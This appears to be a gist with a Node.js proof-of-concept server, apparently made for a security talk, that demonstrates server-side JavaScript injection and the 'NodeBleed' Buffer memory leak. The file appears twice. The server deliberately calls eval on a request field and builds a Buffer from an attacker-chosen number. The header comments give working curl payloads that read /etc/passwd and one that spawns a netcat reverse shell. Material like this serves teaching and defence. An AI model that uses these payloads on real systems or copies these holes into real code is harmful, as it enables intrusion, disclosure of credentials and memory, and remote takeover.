Simpsonpt/nodejs-ssjs-nodebleed.js

## nodejs-ssjs-nodebleed.js
/**
* NodeBleed Original Bug: https://github.com/nodejs/node/issues/4660
* PoC: $ node nodejs-ssjs-nodebleed.js
* "Attack":
*  - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
*  - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
*  - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C
*
* Insecure evals Payloads:
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)
* - --data "{\"str\": 10000,\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
* All Node.js version (5.5.0 and 4.2.6) are vulnerable at the moment.
* $ nvm ls-remote (Play with different versions)
* @SiMpS0N - Fev/2016
*/

var http = require('http');

var server = http.createServer(function(req, res) {
    console.log("### 0xOPOSEC Demos ###")
    var data = ''
    var injection = ''
    req.setEncoding('utf8')
    req.on('data', function(chunk) {
        data += chunk
    })
    console.log(data)
    req.on('end', function() {
	/*Convert a JSON text into an object
	* Tradional way (Not Secure):
	*   var body = eval("("+data+")")
	*   Attack: "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
	*/
	//var body = eval("("+data+")")
	/*
	* Correct way:
	*/
        var body = JSON.parse(data)

        //SSJS Injection (eval JS code)
        console.log("##SSJS Injection")
        console.log("Payload: "+body.injection+"\n")

        injection = eval(body.injection)

        //NodeBleed (new Buffer(int)->MemoryDisclosure)
        console.log("##NodeBleed")
        console.log("Disclosure Bytes: "+body.str)
        res.end(new Buffer(body.str) + "\n" + injection)
    })
})

server.listen(8080)
	/**
	* NodeBleed Original Bug: https://github.com/nodejs/node/issues/4660
	* PoC: $ node nodejs-ssjs-nodebleed.js
	* "Attack":
	* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
	* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
	* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" \| hexdump -C
	*
	* Insecure evals Payloads:
	* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)
	* - --data "{\"str\": 10000,\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
	* All Node.js version (5.5.0 and 4.2.6) are vulnerable at the moment.
	* $ nvm ls-remote (Play with different versions)
	* @SiMpS0N - Fev/2016
	*/

	var http = require('http');

	var server = http.createServer(function(req, res) {
	console.log("### 0xOPOSEC Demos ###")
	var data = ''
	var injection = ''
	req.setEncoding('utf8')
	req.on('data', function(chunk) {
	data += chunk
	})
	console.log(data)
	req.on('end', function() {
	/*Convert a JSON text into an object
	* Tradional way (Not Secure):
	* var body = eval("("+data+")")
	* Attack: "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
	*/
	//var body = eval("("+data+")")
	/*
	* Correct way:
	*/
	var body = JSON.parse(data)

	//SSJS Injection (eval JS code)
	console.log("##SSJS Injection")
	console.log("Payload: "+body.injection+"\n")

	injection = eval(body.injection)

	//NodeBleed (new Buffer(int)->MemoryDisclosure)
	console.log("##NodeBleed")
	console.log("Disclosure Bytes: "+body.str)
	res.end(new Buffer(body.str) + "\n" + injection)
	})
	})

	server.listen(8080)